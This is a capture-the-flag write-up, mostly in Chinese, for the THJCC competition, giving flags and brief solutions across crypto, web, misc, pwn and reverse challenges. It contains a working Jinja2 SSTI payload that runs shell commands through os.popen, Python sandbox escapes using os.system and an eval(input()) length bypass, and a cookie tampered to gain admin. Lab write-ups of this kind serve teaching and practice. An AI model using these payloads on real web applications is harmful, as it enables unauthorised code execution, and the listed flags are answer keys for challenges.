THJCC CTF Writeup

# THJCC CTF Writeup rank: 17 ## welcome ### Welcome 0x1 Flag: `THJCC{5cINt_sC4icT_5C1sT}` 題目視窗THJCC{5cINt_s (1/2)+規則頁面底下C4icT_5C1sT} (2/2) ### Discord 0x1 Flag: `THJCC{r3meMB3R!J01Ndi5c0rD_5eRv3r}` 題序粗體**領取身份組**，推測跟THJCC Bot有關先看到身分組是di5c0rD_5eRv3r} (3/3)，然後機器人profile是THJCC{r3meM (1/3) 通靈嘗試跟機器人對話沒用，看到機器人支援指令，發現可以 `/ls` 跟 `/cat file` ```bash graspingstew631@thjcc:~/$ ls meow.txt woof.txt scint.url flag.txt scaict.url scist.url 5eCR3t_fi1e ``` `/cat flag.txt` 機器人回應B3R!J01N(2/3) ## Crypto ### 博元婦產科 Flag: `THJCC{wWw.b4BymAk3r.c0M.tW}` 題敘 `TUFDVlZ7cFBwLnU0VXJmVGQzay52MEYubVB9Cg==` base64還原 `MACVV{pPp.u4UrfTd3k.v0F.mP}` caesar爆破 `THJCC{wWw.b4BymAk3r.c0M.tW}` ### Baby RSA Flag: `THJCC{small_eeeee_can_be_pwned_easily}` out.txt裡的東西丟去線上RSA解碼器得到Flag ## Web ### Empty Flag: `THJCC{cookie_&_view_source_!}` F12查看網頁原始碼連上 `/Wh4leE4tSh4rk.html` 得到 `FLAG2:view_source_!}` `document.cookie = atob('RkxBRzE9VEhKQ0N7Y29va2llXyZf');` 把cookie設為base64解碼過的字串於是查看 Cookie `THJCC{cookie_&_` ### Blog Flag: `THJCC{w31c0me_h@cker}` EMO那篇的Comment：iloveshark就是admin的密碼，登入拿到Flag ### Simplify Flag: `THJCC{w3ak_auth_+_S$TI}` test:test1234登入，改Cookie變成admin，原始碼提到SSTI然後要我們RCE它注入以下payload，cat say 吐出`flag render.py secret templates userlist.txt` `{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('dir').read()")}}` 再注入以下payload印出Flag ``` {{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag').read()")}} ``` ## Misc ### 出題者大合照！ Flag: `THJCC{S1TC0N_2o2A_a1l_hAnDs0m3_9uY5}` 圖片拿去Steghide，拿到flag.txt打開就是Flag ### Geoguesser??? Flag: `THJCC{35.0039_134.5426}` 搜尋圖中的電話號碼，查詢到アップエイト学習スクール這間補習班，Google map右鍵複製經緯度 ### I want to go to Japan! Flag: `THJCC{41.782_140.791}` https://onsen-musume.jp/news/141189 【湯倉神社】住所：〒042-0932 北海道函館市湯川町2丁目28-1，Google map右鍵複製經緯度 ### 原神帳號外流 Flag: `THJCC{W3r3_sHarKKKKKK_MasT3R_C8763}` 撈封包裡面有的帳密~~都試一試~~，成功登入得到Flag ``` Form item: "name" = "Frieren" Form item: "password" = "B3stan1me" ``` ### PyJail-0 Flag: `THJCC{Use_M2g1c_f2un3ti0n_in_P9Ja1l!!}` 看原始碼沒啥特別的限制，輸入以下指令，得到Flag ```python __import__('os').system('cat ./flag.txt') ``` ### PyJail-1 Flag: `THJCC{Inp3t_b9p2sss_lim1t_1n+p3j2i1!}` 一樣看原始碼，這次限制輸入長度要<15，用eval(input())再做一次input繞過限制(後續同上題) ### Evil Form Flag: `THJCC{Hackkkkthe_google_f0rM_Mordekaiser}` 丟進Burpsuite看HTTP history，在Response搜尋THJCC，搜到`Here is your flag 1/3 : THJCC{` 得知有三段Flag，搜尋2/3跟3/3並丟去解Unicode ``` "Y0u Successful Escape The l00p! again\u003cdiv\u003eBTW I do some encrypt of this message xD\u003cbr\u003e\u003cdiv\u003e\u003cspan\u003ew6C6 :D J@FC 7\u003d28\u003c/span\u003e 2/3: \u003cspan\u003ew24\u0026lt;\u0026lt;\u0026lt;\u0026lt;E96\u003c/span\u003e\u003c/div\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e" ``` ``` Y0u Successful Escape The l00p! again<div>BTW I do some encrypt of this message xD<br><div><span>w6C6 :D J@FC 7=28</span> 2/3: <span>w24<<<<E96</span></div></div><div><br></div> ``` 把 `w6C6 :D J@FC 7=28 2/3: w24<<<<E96` 丟去decode.fr發現是ROT47 解出Here is your flag a^bi Hackkkkthe ``` "Y0u must master in hacking google form!!!\u003cdiv\u003eS0 You als0 g00d at Crypto!!!\u003c/div\u003e\u003cdiv\u003eSGVyZSBpcyB5b3VyIGZsYWcgMy8zIDogX2dvb2dsZV9mMHJNX01vcmRla2Fpc2VyfQ\u003d\u003d\u003cbr\u003e\u003c/div\u003e" ``` Unicode轉換出Here is your flag 3/3 : _google_f0rM_Mordekaiser} ## Pwn ### nc Flag: `THJCC{N3veR_g0nn4_l37_You_dOwn!!!}` nc連上去，回覆Rick Astley拿到Flag ```bash Who published https://www.youtube.com/watch?v=dQw4w9WgXcQ ? > ``` ## Reverse ### Baby C Flag: `THJCC{https://www.youtube.com/watch?v=3XCVM3G3pns}` C語言原始碼判斷輸入字串(正確密碼)中的字元ascii和120的xor是否等於a陣列當中的各個項依照xor特性把a陣列各項和120做xor還原，再ascii轉成字元得到Flag ### PYC REVERSE Flag: `THJCC{pyc_rev3r3e_C3n_u32_on1i5e_t0Ol}` 使用Decompile++(pycdc)反組譯pyc檔案，判斷flag被xor了1~4，撰寫解碼程式 ```python from Crypto.Util.number import * flag=10730390416708814647386325276467849806006354580175878786363505755256613965929606057246313695 flag = flag ^ 124789 ^ 487531 ^ 784523 ^ 642871 x=str(flag) print(long_to_bytes(x)) # Output: b'THJCC{pyc_rev3r3e_C3n_u32_on1i5e_t0Ol}' ```